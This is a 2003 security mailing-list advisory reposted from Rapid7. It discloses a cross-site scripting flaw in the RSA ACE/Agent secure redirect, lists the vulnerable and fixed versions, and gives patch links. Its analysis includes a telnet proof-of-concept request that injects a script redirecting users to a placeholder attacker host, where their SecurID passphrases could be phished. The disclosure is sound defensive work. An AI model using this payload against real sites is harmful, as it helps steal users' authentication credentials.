[NEWS] RSA SecurID ACE Agent Cross Site Scripting

From: SecuriTeam (support_at_securiteam.com)
Date: 06/19/03

  • Next message: SecuriTeam: "[UNIX] SQL Inject in ProFTPD Login against PostgreSQL Using mod_sql" 
    To: list@securiteam.com
Date: 19 Jun 2003 14:53:24 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Latest attack techniques.

    You're a pen tester, but is google.com still your R&D team?
    Now you can get trustworthy commercial-grade exploits and the latest
    techniques from a world-class research group.

    Learn more at http://www.coresecurity.com/promos/sit_e1,
    or call 617-399-6980

    - - - - - - - - -

      RSA SecurID ACE Agent Cross Site Scripting
    ------------------------------------------------------------------------

    SUMMARY

    RSA SecurID provides authentication and access control using the RSA
    SecurID two-factor authentication framework. RSA SecurID two-factor
    authentication is based on something you know (such as a password or a
    PIN) and something you have (an authenticator such as a smart card). RSA
    ACE/Server provides RSA SecurID access control for enterprises.

    RSA provides several RSA ACE/Agents for use with RSA ACE/Server. These
    agents provide integrated RSA SecurID access control for 3rd-party server
    platforms including Microsoft Windows, IIS, UNIX servers (PAM), Apache,
    and Lotus Domino.

    The RSA ACE/Agent allows sites to protect web resources by requiring RSA
    SecurID authentication. Web browsers are automatically redirected to an
    authentication page where the user is required to authenticate with their
    RSA SecurID token before they can access protected resources.

    This secure redirect function of the RSA ACE/Agents protecting IIS,
    Apache, or SunONE web servers contains a cross-site scripting
    vulnerability. The redirector does not properly escape special characters,
    so requests for a URL containing special script characters will cause the
    ACE/Agent to emit a page containing web script which would execute in the
    user's browser. An attacker could potentially use this to fool
    unsuspecting users into entering their passphrase information, which could
    then be replayed by the attacker to the protected server to gain access.

    DETAILS

    Vulnerable systems:
     * RSA ACE/Agent version 5.0 for Windows
     * RSA ACE/Agent version 5.x for Web

    Immune systems:
     * RSA ACE/Agent version 5.0.1 for Windows
     * RSA ACE/Agent version 5.1.1 for Web

    Vendor status and information:
     <http://www.rsasecurity.com> RSA Security, Inc

    The vendor has been notified. This issue had already been discovered and
    fixed by RSA Security in an internal audit. The fix was released to
    customers in February 2003.

    Solution:
    Update to the latest version of RSA ACE/Agent for Windows - version 5.0.1
    or RSA ACE/Agent for Web - version 5.1.1.

    Specific hot fixes and readme files can be downloaded from the following
    FTP sites:

    Customers using the RSA ACE/Agent 5.0 for Windows:
     * RSA Security FTP Site:
     
    <ftp://ftp.rsasecurity.com/support/Patches/Ace/Agent/5.0.1_Agent/Win_Agent501.zip> ftp://ftp.rsasecurity.com/support/Patches/Ace/Agent/5.0.1_Agent/Win_Agent501.zip

    Customers using the RSA ACE/Agent 5.1 for Web:
     * RSA Security FTP Site:
     
    <ftp://ftp.rsasecurity.com/support/Patches/Ace/Agent/5.1.1_Agent/WebAgent5.1.1.tar.gz> ftp://ftp.rsasecurity.com/support/Patches/Ace/Agent/5.1.1_Agent/WebAgent5.1.1.tar.gz

    Detailed analysis:
    Requests for paths containing special characters will cause these special
    characters to be emitted in the resulting redirect page. An attacker could
    potentially use the resulting script to quietly redirect users to his own
    website, where users would be tricked into entering their passphrase
    information.

    For example, the following session illustrates how to redirect the
    browser:

       $ telnet www.example.foo 80
       Connected to www.example.foo.
       Escape character is '^]'.
       GET /">< script>document.location="http://foo.foo"</script> HTTP/1.0

       HTTP/1.1 200 OK
       Server: Microsoft-IIS/5.0
       Content-Type: text/html

       < HTML>
       < HEAD>
          < TITLE>SecurID Secure Link Redirect</TITLE>
       </ HEAD>

       < BODY>

       < H2>
       The page you are trying to access is protected by SecurID.< BR>
       The administrator requires protected pages to be accessed through
       a secure channel.< BR>
       < A HREF="https://www.example.foo:443/">< script>
          document.location="http://www.foo.foo"</script>">
          Click this link to activate the secure channel for this page.</A>
       </H2>

       </BODY>
       </HTML>

    ADDITIONAL INFORMATION

    The original advisory can be downloaded from:
     <http://www.rapid7.com/advisories/R7-0014.html>
    http://www.rapid7.com/advisories/R7-0014.html

    The information has been provided by <mailto:advisory@rapid7.com> Rapid7,
    Inc. Security Advisory.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] SQL Inject in ProFTPD Login against PostgreSQL Using mod_sql"

    Relevant Pages